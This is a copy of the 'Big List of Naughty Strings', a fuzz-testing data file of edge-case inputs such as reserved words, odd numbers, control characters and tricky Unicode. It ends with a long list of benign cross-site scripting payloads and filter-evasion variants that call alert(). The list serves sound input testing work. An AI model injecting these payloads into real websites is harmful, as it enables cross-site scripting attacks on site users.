|  | # sourced from https://raw.githubusercontent.com/minimaxir/big-list-of-naughty-strings/master/blns.txt | 
|  |  | 
|  | #	Reserved Strings | 
|  | # | 
|  | #	Strings which may be used elsewhere in code | 
|  |  | 
|  | undefined | 
|  | undef | 
|  | null | 
|  | NULL | 
|  | (null) | 
|  | nil | 
|  | NIL | 
|  | true | 
|  | false | 
|  | True | 
|  | False | 
|  | TRUE | 
|  | FALSE | 
|  | None | 
|  | hasOwnProperty | 
|  | \ | 
|  | \\ | 
|  |  | 
|  | #	Numeric Strings | 
|  | # | 
|  | #	Strings which can be interpreted as numeric | 
|  |  | 
|  | 0 | 
|  | 1 | 
|  | 1.00 | 
|  | $1.00 | 
|  | 1/2 | 
|  | 1E2 | 
|  | 1E02 | 
|  | 1E+02 | 
|  | -1 | 
|  | -1.00 | 
|  | -$1.00 | 
|  | -1/2 | 
|  | -1E2 | 
|  | -1E02 | 
|  | -1E+02 | 
|  | 1/0 | 
|  | 0/0 | 
|  | -2147483648/-1 | 
|  | -9223372036854775808/-1 | 
|  | -0 | 
|  | -0.0 | 
|  | +0 | 
|  | +0.0 | 
|  | 0.00 | 
|  | 0..0 | 
|  | . | 
|  | 0.0.0 | 
|  | 0,00 | 
|  | 0,,0 | 
|  | , | 
|  | 0,0,0 | 
|  | 0.0/0 | 
|  | 1.0/0.0 | 
|  | 0.0/0.0 | 
|  | 1,0/0,0 | 
|  | 0,0/0,0 | 
|  | --1 | 
|  | - | 
|  | -. | 
|  | -, | 
|  | 999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999 | 
|  | NaN | 
|  | Infinity | 
|  | -Infinity | 
|  | INF | 
|  | 1#INF | 
|  | -1#IND | 
|  | 1#QNAN | 
|  | 1#SNAN | 
|  | 1#IND | 
|  | 0x0 | 
|  | 0xffffffff | 
|  | 0xffffffffffffffff | 
|  | 0xabad1dea | 
|  | 123456789012345678901234567890123456789 | 
|  | 1,000.00 | 
|  | 1 000.00 | 
|  | 1'000.00 | 
|  | 1,000,000.00 | 
|  | 1 000 000.00 | 
|  | 1'000'000.00 | 
|  | 1.000,00 | 
|  | 1 000,00 | 
|  | 1'000,00 | 
|  | 1.000.000,00 | 
|  | 1 000 000,00 | 
|  | 1'000'000,00 | 
|  | 01000 | 
|  | 08 | 
|  | 09 | 
|  | 2.2250738585072011e-308 | 
|  |  | 
|  | #	Special Characters | 
|  | # | 
|  | # ASCII punctuation.  All of these characters may need to be escaped in some | 
|  | # contexts.  Divided into three groups based on (US-layout) keyboard position. | 
|  |  | 
|  | ,./;'[]\-= | 
|  | <>?:"{}|_+ | 
|  | !@#$%^&*()`~ | 
|  |  | 
|  | # Non-whitespace C0 controls: U+0001 through U+0008, U+000E through U+001F, | 
|  | # and U+007F (DEL) | 
|  | # Often forbidden to appear in various text-based file formats (e.g. XML), | 
|  | # or reused for internal delimiters on the theory that they should never | 
|  | # appear in input. | 
|  | # The next line may appear to be blank or mojibake in some viewers. | 
|  |  | 
|  |  | 
|  | # Non-whitespace C1 controls: U+0080 through U+0084 and U+0086 through U+009F. | 
|  | # Commonly misinterpreted as additional graphic characters. | 
|  | # The next line may appear to be blank, mojibake, or dingbats in some viewers. | 
|  |  | 
|  |  | 
|  | # Whitespace: all of the characters with category Zs, Zl, or Zp (in Unicode | 
|  | # version 8.0.0), plus U+0009 (HT), U+000B (VT), U+000C (FF), U+0085 (NEL), | 
|  | # and U+200B (ZERO WIDTH SPACE), which are in the C categories but are often | 
|  | # treated as whitespace in some contexts. | 
|  | # This file unfortunately cannot express strings containing | 
|  | # U+0000, U+000A, or U+000D (NUL, LF, CR). | 
|  | # The next line may appear to be blank or mojibake in some viewers. | 
|  | # The next line may be flagged for "trailing whitespace" in some viewers. | 
|  |  | 
|  |  | 
|  | # Unicode additional control characters: all of the characters with | 
|  | # general category Cf (in Unicode 8.0.0). | 
|  | # The next line may appear to be blank or mojibake in some viewers. | 
|  |  | 
|  |  | 
|  | # "Byte order marks", U+FEFF and U+FFFE, each on its own line. | 
|  | # The next two lines may appear to be blank or mojibake in some viewers. | 
|  |  | 
|  |  | 
|  |  | 
|  | #	Unicode Symbols | 
|  | # | 
|  | #	Strings which contain common unicode symbols (e.g. smart quotes) | 
|  |  | 
|  | Ω≈ç√∫˜µ≤≥÷ | 
|  | åß∂ƒ©˙∆˚¬…æ | 
|  | œ∑´®†¥¨ˆøπ“‘ | 
|  | ¡™£¢∞§¶•ªº–≠ | 
|  | ¸˛Ç◊ı˜Â¯˘¿ | 
|  | ÅÍÎÏ˝ÓÔÒÚÆ☃ | 
|  | Œ„´‰ˇÁ¨ˆØ∏”’ | 
|  | `⁄€‹›fifl‡°·‚—± | 
|  | ⅛⅜⅝⅞ | 
|  | ЁЂЃЄЅІЇЈЉЊЋЌЍЎЏАБВГДЕЖЗИЙКЛМНОПРСТУФХЦЧШЩЪЫЬЭЮЯабвгдежзийклмнопрстуфхцчшщъыьэюя | 
|  | ٠١٢٣٤٥٦٧٨٩ | 
|  |  | 
|  | #	Unicode Subscript/Superscript/Accents | 
|  | # | 
|  | #	Strings which contain unicode subscripts/superscripts; can cause rendering issues | 
|  |  | 
|  | ⁰⁴⁵ | 
|  | ₀₁₂ | 
|  | ⁰⁴⁵₀₁₂ | 
|  | ด้้้้้็็็็็้้้้้็็็็็้้้้้้้้็็็็็้้้้้็็็็็้้้้้้้้็็็็็้้้้้็็็็็้้้้้้้้็็็็็้้้้้็็็็ ด้้้้้็็็็็้้้้้็็็็็้้้้้้้้็็็็็้้้้้็็็็็้้้้้้้้็็็็็้้้้้็็็็็้้้้้้้้็็็็็้้้้้็็็็ ด้้้้้็็็็็้้้้้็็็็็้้้้้้้้็็็็็้้้้้็็็็็้้้้้้้้็็็็็้้้้้็็็็็้้้้้้้้็็็็็้้้้้็็็็ | 
|  |  | 
|  | #	Quotation Marks | 
|  | # | 
|  | #	Strings which contain misplaced quotation marks; can cause encoding errors | 
|  |  | 
|  | ' | 
|  | " | 
|  | '' | 
|  | "" | 
|  | '"' | 
|  | "''''"'" | 
|  | "'"'"''''" | 
|  | <foo val=“bar” /> | 
|  | <foo val=“bar” /> | 
|  | <foo val=”bar“ /> | 
|  | <foo val=`bar' /> | 
|  |  | 
|  | #	Two-Byte Characters | 
|  | # | 
|  | #	Strings which contain two-byte characters: can cause rendering issues or character-length issues | 
|  |  | 
|  | 田中さんにあげて下さい | 
|  | パーティーへ行かないか | 
|  | 和製漢語 | 
|  | 部落格 | 
|  | 사회과학원 어학연구소 | 
|  | 찦차를 타고 온 펲시맨과 쑛다리 똠방각하 | 
|  | 社會科學院語學研究所 | 
|  | 울란바토르 | 
|  | 𠜎𠜱𠝹𠱓𠱸𠲖𠳏 | 
|  |  | 
|  | #	Changing length when lowercased | 
|  | # | 
|  | #	Characters which increase in length (2 to 3 bytes) when lowercased | 
|  | #	Credit: https://twitter.com/jifa/status/625776454479970304 | 
|  |  | 
|  | Ⱥ | 
|  | Ⱦ | 
|  |  | 
|  | #	Japanese Emoticons | 
|  | # | 
|  | #	Strings which consists of Japanese-style emoticons which are popular on the web | 
|  |  | 
|  | ヽ༼ຈل͜ຈ༽ノ ヽ༼ຈل͜ຈ༽ノ | 
|  | (。◕ ∀ ◕。) | 
|  | `ィ(´∀`∩ | 
|  | __ロ(,_,*) | 
|  | ・( ̄∀ ̄)・:*: | 
|  | ゚・✿ヾ╲(。◕‿◕。)╱✿・゚ | 
|  | ,。・:*:・゜’( ☻ ω ☻ )。・:*:・゜’ | 
|  | (╯°□°)╯︵ ┻━┻) | 
|  | (ノಥ益ಥ)ノ ┻━┻ | 
|  | ┬─┬ノ( º _ ºノ) | 
|  | ( ͡° ͜ʖ ͡°) | 
|  |  | 
|  | #	Emoji | 
|  | # | 
|  | #	Strings which contain Emoji; should be the same behavior as two-byte characters, but not always | 
|  |  | 
|  | 😍 | 
|  | 👩🏽 | 
|  | 👾 🙇 💁 🙅 🙆 🙋 🙎 🙍 | 
|  | 🐵 🙈 🙉 🙊 | 
|  | ❤️ 💔 💌 💕 💞 💓 💗 💖 💘 💝 💟 💜 💛 💚 💙 | 
|  | ✋🏿 💪🏿 👐🏿 🙌🏿 👏🏿 🙏🏿 | 
|  | 🚾 🆒 🆓 🆕 🆖 🆗 🆙 🏧 | 
|  | 0️⃣ 1️⃣ 2️⃣ 3️⃣ 4️⃣ 5️⃣ 6️⃣ 7️⃣ 8️⃣ 9️⃣ 🔟 | 
|  |  | 
|  | #       Regional Indicator Symbols | 
|  | # | 
|  | #       Regional Indicator Symbols can be displayed differently across | 
|  | #       fonts, and have a number of special behaviors | 
|  |  | 
|  | 🇺🇸🇷🇺🇸 🇦🇫🇦🇲🇸 | 
|  | 🇺🇸🇷🇺🇸🇦🇫🇦🇲 | 
|  | 🇺🇸🇷🇺🇸🇦 | 
|  |  | 
|  | #	Unicode Numbers | 
|  | # | 
|  | #	Strings which contain unicode numbers; if the code is localized, it should see the input as numeric | 
|  |  | 
|  | 123 | 
|  | ١٢٣ | 
|  |  | 
|  | #	Right-To-Left Strings | 
|  | # | 
|  | #	Strings which contain text that should be rendered RTL if possible (e.g. Arabic, Hebrew) | 
|  |  | 
|  | ثم نفس سقطت وبالتحديد،, جزيرتي باستخدام أن دنو. إذ هنا؟ الستار وتنصيب كان. أهّل ايطاليا، بريطانيا-فرنسا قد أخذ. سليمان، إتفاقية بين ما, يذكر الحدود أي بعد, معاملة بولندا، الإطلاق عل إيو. | 
|  | בְּרֵאשִׁית, בָּרָא אֱלֹהִים, אֵת הַשָּׁמַיִם, וְאֵת הָאָרֶץ | 
|  | הָיְתָהtestالصفحات التّحول | 
|  | ﷽ | 
|  | ﷺ | 
|  | مُنَاقَشَةُ سُبُلِ اِسْتِخْدَامِ اللُّغَةِ فِي النُّظُمِ الْقَائِمَةِ وَفِيم يَخُصَّ التَّطْبِيقَاتُ الْحاسُوبِيَّةُ، | 
|  |  | 
|  | #	Trick Unicode | 
|  | # | 
|  | #	Strings which contain unicode with unusual properties (e.g. Right-to-left override) (c.f. http://www.unicode.org/charts/PDF/U2000.pdf) | 
|  |  | 
|  | test | 
|  | test | 
|  | test | 
|  | testtest | 
|  | test | 
|  |  | 
|  | #	Zalgo Text | 
|  | # | 
|  | #	Strings which contain "corrupted" text. The corruption will not appear in non-HTML text, however. (via http://www.eeemo.net) | 
|  |  | 
|  | Ṱ̺̺̕o͞ ̷i̲̬͇̪͙n̝̗͕v̟̜̘̦͟o̶̙̰̠kè͚̮̺̪̹̱̤ ̖t̝͕̳̣̻̪͞h̼͓̲̦̳̘̲e͇̣̰̦̬͎ ̢̼̻̱̘h͚͎͙̜̣̲ͅi̦̲̣̰̤v̻͍e̺̭̳̪̰-m̢iͅn̖̺̞̲̯̰d̵̼̟͙̩̼̘̳ ̞̥̱̳̭r̛̗̘e͙p͠r̼̞̻̭̗e̺̠̣͟s̘͇̳͍̝͉e͉̥̯̞̲͚̬͜ǹ̬͎͎̟̖͇̤t͍̬̤͓̼̭͘ͅi̪̱n͠g̴͉ ͏͉ͅc̬̟h͡a̫̻̯͘o̫̟̖͍̙̝͉s̗̦̲.̨̹͈̣ | 
|  | ̡͓̞ͅI̗̘̦͝n͇͇͙v̮̫ok̲̫̙͈i̖͙̭̹̠̞n̡̻̮̣̺g̲͈͙̭͙̬͎ ̰t͔̦h̞̲e̢̤ ͍̬̲͖f̴̘͕̣è͖ẹ̥̩l͖͔͚i͓͚̦͠n͖͍̗͓̳̮g͍ ̨o͚̪͡f̘̣̬ ̖̘͖̟͙̮c҉͔̫͖͓͇͖ͅh̵̤̣͚͔á̗̼͕ͅo̼̣̥s̱͈̺̖̦̻͢.̛̖̞̠̫̰ | 
|  | ̗̺͖̹̯͓Ṯ̤͍̥͇͈h̲́e͏͓̼̗̙̼̣͔ ͇̜̱̠͓͍ͅN͕͠e̗̱z̘̝̜̺͙p̤̺̹͍̯͚e̠̻̠͜r̨̤͍̺̖͔̖̖d̠̟̭̬̝͟i̦͖̩͓͔̤a̠̗̬͉̙n͚͜ ̻̞̰͚ͅh̵͉i̳̞v̢͇ḙ͎͟-҉̭̩̼͔m̤̭̫i͕͇̝̦n̗͙ḍ̟ ̯̲͕͞ǫ̟̯̰̲͙̻̝f ̪̰̰̗̖̭̘͘c̦͍̲̞͍̩̙ḥ͚a̮͎̟̙͜ơ̩̹͎s̤.̝̝ ҉Z̡̖̜͖̰̣͉̜a͖̰͙̬͡l̲̫̳͍̩g̡̟̼̱͚̞̬ͅo̗͜.̟ | 
|  | ̦H̬̤̗̤͝e͜ ̜̥̝̻͍̟́w̕h̖̯͓o̝͙̖͎̱̮ ҉̺̙̞̟͈W̷̼̭a̺̪͍į͈͕̭͙̯̜t̶̼̮s̘͙͖̕ ̠̫̠B̻͍͙͉̳ͅe̵h̵̬͇̫͙i̹͓̳̳̮͎̫̕n͟d̴̪̜̖ ̰͉̩͇͙̲͞ͅT͖̼͓̪͢h͏͓̮̻e̬̝̟ͅ ̤̹̝W͙̞̝͔͇͝ͅa͏͓͔̹̼̣l̴͔̰̤̟͔ḽ̫.͕ | 
|  | Z̮̞̠͙͔ͅḀ̗̞͈̻̗Ḷ͙͎̯̹̞͓G̻O̭̗̮ | 
|  |  | 
|  | #	Unicode Upsidedown | 
|  | # | 
|  | #	Strings which contain unicode with an "upsidedown" effect (via http://www.upsidedowntext.com) | 
|  |  | 
|  | ˙ɐnbᴉlɐ ɐuƃɐɯ ǝɹolop ʇǝ ǝɹoqɐl ʇn ʇunpᴉpᴉɔuᴉ ɹodɯǝʇ poɯsnᴉǝ op pǝs 'ʇᴉlǝ ƃuᴉɔsᴉdᴉpɐ ɹnʇǝʇɔǝsuoɔ 'ʇǝɯɐ ʇᴉs ɹolop ɯnsdᴉ ɯǝɹo˥ | 
|  | 00˙Ɩ$- | 
|  |  | 
|  | #	Unicode font | 
|  | # | 
|  | #	Strings which contain bold/italic/etc. versions of normal characters | 
|  |  | 
|  | The quick brown fox jumps over the lazy dog | 
|  | 𝐓𝐡𝐞 𝐪𝐮𝐢𝐜𝐤 𝐛𝐫𝐨𝐰𝐧 𝐟𝐨𝐱 𝐣𝐮𝐦𝐩𝐬 𝐨𝐯𝐞𝐫 𝐭𝐡𝐞 𝐥𝐚𝐳𝐲 𝐝𝐨𝐠 | 
|  | 𝕿𝖍𝖊 𝖖𝖚𝖎𝖈𝖐 𝖇𝖗𝖔𝖜𝖓 𝖋𝖔𝖝 𝖏𝖚𝖒𝖕𝖘 𝖔𝖛𝖊𝖗 𝖙𝖍𝖊 𝖑𝖆𝖟𝖞 𝖉𝖔𝖌 | 
|  | 𝑻𝒉𝒆 𝒒𝒖𝒊𝒄𝒌 𝒃𝒓𝒐𝒘𝒏 𝒇𝒐𝒙 𝒋𝒖𝒎𝒑𝒔 𝒐𝒗𝒆𝒓 𝒕𝒉𝒆 𝒍𝒂𝒛𝒚 𝒅𝒐𝒈 | 
|  | 𝓣𝓱𝓮 𝓺𝓾𝓲𝓬𝓴 𝓫𝓻𝓸𝔀𝓷 𝓯𝓸𝔁 𝓳𝓾𝓶𝓹𝓼 𝓸𝓿𝓮𝓻 𝓽𝓱𝓮 𝓵𝓪𝔃𝔂 𝓭𝓸𝓰 | 
|  | 𝕋𝕙𝕖 𝕢𝕦𝕚𝕔𝕜 𝕓𝕣𝕠𝕨𝕟 𝕗𝕠𝕩 𝕛𝕦𝕞𝕡𝕤 𝕠𝕧𝕖𝕣 𝕥𝕙𝕖 𝕝𝕒𝕫𝕪 𝕕𝕠𝕘 | 
|  | 𝚃𝚑𝚎 𝚚𝚞𝚒𝚌𝚔 𝚋𝚛𝚘𝚠𝚗 𝚏𝚘𝚡 𝚓𝚞𝚖𝚙𝚜 𝚘𝚟𝚎𝚛 𝚝𝚑𝚎 𝚕𝚊𝚣𝚢 𝚍𝚘𝚐 | 
|  | ⒯⒣⒠ ⒬⒰⒤⒞⒦ ⒝⒭⒪⒲⒩ ⒡⒪⒳ ⒥⒰⒨⒫⒮ ⒪⒱⒠⒭ ⒯⒣⒠ ⒧⒜⒵⒴ ⒟⒪⒢ | 
|  |  | 
|  | #	Script Injection | 
|  | # | 
|  | #	Strings which attempt to invoke a benign script injection; shows vulnerability to XSS | 
|  |  | 
|  | <script>alert(123)</script> | 
|  | <script>alert('123');</script> | 
|  | <img src=x onerror=alert(123) /> | 
|  | <svg><script>123<1>alert(123)</script> | 
|  | "><script>alert(123)</script> | 
|  | '><script>alert(123)</script> | 
|  | ><script>alert(123)</script> | 
|  | </script><script>alert(123)</script> | 
|  | < / script >< script >alert(123)< / script > | 
|  | onfocus=JaVaSCript:alert(123) autofocus | 
|  | " onfocus=JaVaSCript:alert(123) autofocus | 
|  | ' onfocus=JaVaSCript:alert(123) autofocus | 
|  | <script>alert(123)</script> | 
|  | <sc<script>ript>alert(123)</sc</script>ript> | 
|  | --><script>alert(123)</script> | 
|  | ";alert(123);t=" | 
|  | ';alert(123);t=' | 
|  | JavaSCript:alert(123) | 
|  | ;alert(123); | 
|  | src=JaVaSCript:prompt(132) | 
|  | "><script>alert(123);</script x=" | 
|  | '><script>alert(123);</script x=' | 
|  | ><script>alert(123);</script x= | 
|  | " autofocus onkeyup="javascript:alert(123) | 
|  | ' autofocus onkeyup='javascript:alert(123) | 
|  | <script\x20type="text/javascript">javascript:alert(1);</script> | 
|  | <script\x3Etype="text/javascript">javascript:alert(1);</script> | 
|  | <script\x0Dtype="text/javascript">javascript:alert(1);</script> | 
|  | <script\x09type="text/javascript">javascript:alert(1);</script> | 
|  | <script\x0Ctype="text/javascript">javascript:alert(1);</script> | 
|  | <script\x2Ftype="text/javascript">javascript:alert(1);</script> | 
|  | <script\x0Atype="text/javascript">javascript:alert(1);</script> | 
|  | '`"><\x3Cscript>javascript:alert(1)</script> | 
|  | '`"><\x00script>javascript:alert(1)</script> | 
|  | ABC<div style="x\x3Aexpression(javascript:alert(1)">DEF | 
|  | ABC<div style="x:expression\x5C(javascript:alert(1)">DEF | 
|  | ABC<div style="x:expression\x00(javascript:alert(1)">DEF | 
|  | ABC<div style="x:exp\x00ression(javascript:alert(1)">DEF | 
|  | ABC<div style="x:exp\x5Cression(javascript:alert(1)">DEF | 
|  | ABC<div style="x:\x0Aexpression(javascript:alert(1)">DEF | 
|  | ABC<div style="x:\x09expression(javascript:alert(1)">DEF | 
|  | ABC<div style="x:\xE3\x80\x80expression(javascript:alert(1)">DEF | 
|  | ABC<div style="x:\xE2\x80\x84expression(javascript:alert(1)">DEF | 
|  | ABC<div style="x:\xC2\xA0expression(javascript:alert(1)">DEF | 
|  | ABC<div style="x:\xE2\x80\x80expression(javascript:alert(1)">DEF | 
|  | ABC<div style="x:\xE2\x80\x8Aexpression(javascript:alert(1)">DEF | 
|  | ABC<div style="x:\x0Dexpression(javascript:alert(1)">DEF | 
|  | ABC<div style="x:\x0Cexpression(javascript:alert(1)">DEF | 
|  | ABC<div style="x:\xE2\x80\x87expression(javascript:alert(1)">DEF | 
|  | ABC<div style="x:\xEF\xBB\xBFexpression(javascript:alert(1)">DEF | 
|  | ABC<div style="x:\x20expression(javascript:alert(1)">DEF | 
|  | ABC<div style="x:\xE2\x80\x88expression(javascript:alert(1)">DEF | 
|  | ABC<div style="x:\x00expression(javascript:alert(1)">DEF | 
|  | ABC<div style="x:\xE2\x80\x8Bexpression(javascript:alert(1)">DEF | 
|  | ABC<div style="x:\xE2\x80\x86expression(javascript:alert(1)">DEF | 
|  | ABC<div style="x:\xE2\x80\x85expression(javascript:alert(1)">DEF | 
|  | ABC<div style="x:\xE2\x80\x82expression(javascript:alert(1)">DEF | 
|  | ABC<div style="x:\x0Bexpression(javascript:alert(1)">DEF | 
|  | ABC<div style="x:\xE2\x80\x81expression(javascript:alert(1)">DEF | 
|  | ABC<div style="x:\xE2\x80\x83expression(javascript:alert(1)">DEF | 
|  | ABC<div style="x:\xE2\x80\x89expression(javascript:alert(1)">DEF | 
|  | <a href="\x0Bjavascript:javascript:alert(1)" id="fuzzelement1">test</a> | 
|  | <a href="\x0Fjavascript:javascript:alert(1)" id="fuzzelement1">test</a> | 
|  | <a href="\xC2\xA0javascript:javascript:alert(1)" id="fuzzelement1">test</a> | 
|  | <a href="\x05javascript:javascript:alert(1)" id="fuzzelement1">test</a> | 
|  | <a href="\xE1\xA0\x8Ejavascript:javascript:alert(1)" id="fuzzelement1">test</a> | 
|  | <a href="\x18javascript:javascript:alert(1)" id="fuzzelement1">test</a> | 
|  | <a href="\x11javascript:javascript:alert(1)" id="fuzzelement1">test</a> | 
|  | <a href="\xE2\x80\x88javascript:javascript:alert(1)" id="fuzzelement1">test</a> | 
|  | <a href="\xE2\x80\x89javascript:javascript:alert(1)" id="fuzzelement1">test</a> | 
|  | <a href="\xE2\x80\x80javascript:javascript:alert(1)" id="fuzzelement1">test</a> | 
|  | <a href="\x17javascript:javascript:alert(1)" id="fuzzelement1">test</a> | 
|  | <a href="\x03javascript:javascript:alert(1)" id="fuzzelement1">test</a> | 
|  | <a href="\x0Ejavascript:javascript:alert(1)" id="fuzzelement1">test</a> | 
|  | <a href="\x1Ajavascript:javascript:alert(1)" id="fuzzelement1">test</a> | 
|  | <a href="\x00javascript:javascript:alert(1)" id="fuzzelement1">test</a> | 
|  | <a href="\x10javascript:javascript:alert(1)" id="fuzzelement1">test</a> | 
|  | <a href="\xE2\x80\x82javascript:javascript:alert(1)" id="fuzzelement1">test</a> | 
|  | <a href="\x20javascript:javascript:alert(1)" id="fuzzelement1">test</a> | 
|  | <a href="\x13javascript:javascript:alert(1)" id="fuzzelement1">test</a> | 
|  | <a href="\x09javascript:javascript:alert(1)" id="fuzzelement1">test</a> | 
|  | <a href="\xE2\x80\x8Ajavascript:javascript:alert(1)" id="fuzzelement1">test</a> | 
|  | <a href="\x14javascript:javascript:alert(1)" id="fuzzelement1">test</a> | 
|  | <a href="\x19javascript:javascript:alert(1)" id="fuzzelement1">test</a> | 
|  | <a href="\xE2\x80\xAFjavascript:javascript:alert(1)" id="fuzzelement1">test</a> | 
|  | <a href="\x1Fjavascript:javascript:alert(1)" id="fuzzelement1">test</a> | 
|  | <a href="\xE2\x80\x81javascript:javascript:alert(1)" id="fuzzelement1">test</a> | 
|  | <a href="\x1Djavascript:javascript:alert(1)" id="fuzzelement1">test</a> | 
|  | <a href="\xE2\x80\x87javascript:javascript:alert(1)" id="fuzzelement1">test</a> | 
|  | <a href="\x07javascript:javascript:alert(1)" id="fuzzelement1">test</a> | 
|  | <a href="\xE1\x9A\x80javascript:javascript:alert(1)" id="fuzzelement1">test</a> | 
|  | <a href="\xE2\x80\x83javascript:javascript:alert(1)" id="fuzzelement1">test</a> | 
|  | <a href="\x04javascript:javascript:alert(1)" id="fuzzelement1">test</a> | 
|  | <a href="\x01javascript:javascript:alert(1)" id="fuzzelement1">test</a> | 
|  | <a href="\x08javascript:javascript:alert(1)" id="fuzzelement1">test</a> | 
|  | <a href="\xE2\x80\x84javascript:javascript:alert(1)" id="fuzzelement1">test</a> | 
|  | <a href="\xE2\x80\x86javascript:javascript:alert(1)" id="fuzzelement1">test</a> | 
|  | <a href="\xE3\x80\x80javascript:javascript:alert(1)" id="fuzzelement1">test</a> | 
|  | <a href="\x12javascript:javascript:alert(1)" id="fuzzelement1">test</a> | 
|  | <a href="\x0Djavascript:javascript:alert(1)" id="fuzzelement1">test</a> | 
|  | <a href="\x0Ajavascript:javascript:alert(1)" id="fuzzelement1">test</a> | 
|  | <a href="\x0Cjavascript:javascript:alert(1)" id="fuzzelement1">test</a> | 
|  | <a href="\x15javascript:javascript:alert(1)" id="fuzzelement1">test</a> | 
|  | <a href="\xE2\x80\xA8javascript:javascript:alert(1)" id="fuzzelement1">test</a> | 
|  | <a href="\x16javascript:javascript:alert(1)" id="fuzzelement1">test</a> | 
|  | <a href="\x02javascript:javascript:alert(1)" id="fuzzelement1">test</a> | 
|  | <a href="\x1Bjavascript:javascript:alert(1)" id="fuzzelement1">test</a> | 
|  | <a href="\x06javascript:javascript:alert(1)" id="fuzzelement1">test</a> | 
|  | <a href="\xE2\x80\xA9javascript:javascript:alert(1)" id="fuzzelement1">test</a> | 
|  | <a href="\xE2\x80\x85javascript:javascript:alert(1)" id="fuzzelement1">test</a> | 
|  | <a href="\x1Ejavascript:javascript:alert(1)" id="fuzzelement1">test</a> | 
|  | <a href="\xE2\x81\x9Fjavascript:javascript:alert(1)" id="fuzzelement1">test</a> | 
|  | <a href="\x1Cjavascript:javascript:alert(1)" id="fuzzelement1">test</a> | 
|  | <a href="javascript\x00:javascript:alert(1)" id="fuzzelement1">test</a> | 
|  | <a href="javascript\x3A:javascript:alert(1)" id="fuzzelement1">test</a> | 
|  | <a href="javascript\x09:javascript:alert(1)" id="fuzzelement1">test</a> | 
|  | <a href="javascript\x0D:javascript:alert(1)" id="fuzzelement1">test</a> | 
|  | <a href="javascript\x0A:javascript:alert(1)" id="fuzzelement1">test</a> | 
|  | `"'><img src=xxx:x \x0Aonerror=javascript:alert(1)> | 
|  | `"'><img src=xxx:x \x22onerror=javascript:alert(1)> | 
|  | `"'><img src=xxx:x \x0Bonerror=javascript:alert(1)> | 
|  | `"'><img src=xxx:x \x0Donerror=javascript:alert(1)> | 
|  | `"'><img src=xxx:x \x2Fonerror=javascript:alert(1)> | 
|  | `"'><img src=xxx:x \x09onerror=javascript:alert(1)> | 
|  | `"'><img src=xxx:x \x0Conerror=javascript:alert(1)> | 
|  | `"'><img src=xxx:x \x00onerror=javascript:alert(1)> | 
|  | `"'><img src=xxx:x \x27onerror=javascript:alert(1)> | 
|  | `"'><img src=xxx:x \x20onerror=javascript:alert(1)> | 
|  | "`'><script>\x3Bjavascript:alert(1)</script> | 
|  | "`'><script>\x0Djavascript:alert(1)</script> | 
|  | "`'><script>\xEF\xBB\xBFjavascript:alert(1)</script> | 
|  | "`'><script>\xE2\x80\x81javascript:alert(1)</script> | 
|  | "`'><script>\xE2\x80\x84javascript:alert(1)</script> | 
|  | "`'><script>\xE3\x80\x80javascript:alert(1)</script> | 
|  | "`'><script>\x09javascript:alert(1)</script> | 
|  | "`'><script>\xE2\x80\x89javascript:alert(1)</script> | 
|  | "`'><script>\xE2\x80\x85javascript:alert(1)</script> | 
|  | "`'><script>\xE2\x80\x88javascript:alert(1)</script> | 
|  | "`'><script>\x00javascript:alert(1)</script> | 
|  | "`'><script>\xE2\x80\xA8javascript:alert(1)</script> | 
|  | "`'><script>\xE2\x80\x8Ajavascript:alert(1)</script> | 
|  | "`'><script>\xE1\x9A\x80javascript:alert(1)</script> | 
|  | "`'><script>\x0Cjavascript:alert(1)</script> | 
|  | "`'><script>\x2Bjavascript:alert(1)</script> | 
|  | "`'><script>\xF0\x90\x96\x9Ajavascript:alert(1)</script> | 
|  | "`'><script>-javascript:alert(1)</script> | 
|  | "`'><script>\x0Ajavascript:alert(1)</script> | 
|  | "`'><script>\xE2\x80\xAFjavascript:alert(1)</script> | 
|  | "`'><script>\x7Ejavascript:alert(1)</script> | 
|  | "`'><script>\xE2\x80\x87javascript:alert(1)</script> | 
|  | "`'><script>\xE2\x81\x9Fjavascript:alert(1)</script> | 
|  | "`'><script>\xE2\x80\xA9javascript:alert(1)</script> | 
|  | "`'><script>\xC2\x85javascript:alert(1)</script> | 
|  | "`'><script>\xEF\xBF\xAEjavascript:alert(1)</script> | 
|  | "`'><script>\xE2\x80\x83javascript:alert(1)</script> | 
|  | "`'><script>\xE2\x80\x8Bjavascript:alert(1)</script> | 
|  | "`'><script>\xEF\xBF\xBEjavascript:alert(1)</script> | 
|  | "`'><script>\xE2\x80\x80javascript:alert(1)</script> | 
|  | "`'><script>\x21javascript:alert(1)</script> | 
|  | "`'><script>\xE2\x80\x82javascript:alert(1)</script> | 
|  | "`'><script>\xE2\x80\x86javascript:alert(1)</script> | 
|  | "`'><script>\xE1\xA0\x8Ejavascript:alert(1)</script> | 
|  | "`'><script>\x0Bjavascript:alert(1)</script> | 
|  | "`'><script>\x20javascript:alert(1)</script> | 
|  | "`'><script>\xC2\xA0javascript:alert(1)</script> | 
|  | <img \x00src=x onerror="alert(1)"> | 
|  | <img \x47src=x onerror="javascript:alert(1)"> | 
|  | <img \x11src=x onerror="javascript:alert(1)"> | 
|  | <img \x12src=x onerror="javascript:alert(1)"> | 
|  | <img\x47src=x onerror="javascript:alert(1)"> | 
|  | <img\x10src=x onerror="javascript:alert(1)"> | 
|  | <img\x13src=x onerror="javascript:alert(1)"> | 
|  | <img\x32src=x onerror="javascript:alert(1)"> | 
|  | <img\x47src=x onerror="javascript:alert(1)"> | 
|  | <img\x11src=x onerror="javascript:alert(1)"> | 
|  | <img \x47src=x onerror="javascript:alert(1)"> | 
|  | <img \x34src=x onerror="javascript:alert(1)"> | 
|  | <img \x39src=x onerror="javascript:alert(1)"> | 
|  | <img \x00src=x onerror="javascript:alert(1)"> | 
|  | <img src\x09=x onerror="javascript:alert(1)"> | 
|  | <img src\x10=x onerror="javascript:alert(1)"> | 
|  | <img src\x13=x onerror="javascript:alert(1)"> | 
|  | <img src\x32=x onerror="javascript:alert(1)"> | 
|  | <img src\x12=x onerror="javascript:alert(1)"> | 
|  | <img src\x11=x onerror="javascript:alert(1)"> | 
|  | <img src\x00=x onerror="javascript:alert(1)"> | 
|  | <img src\x47=x onerror="javascript:alert(1)"> | 
|  | <img src=x\x09onerror="javascript:alert(1)"> | 
|  | <img src=x\x10onerror="javascript:alert(1)"> | 
|  | <img src=x\x11onerror="javascript:alert(1)"> | 
|  | <img src=x\x12onerror="javascript:alert(1)"> | 
|  | <img src=x\x13onerror="javascript:alert(1)"> | 
|  | <img[a][b][c]src[d]=x[e]onerror=[f]"alert(1)"> | 
|  | <img src=x onerror=\x09"javascript:alert(1)"> | 
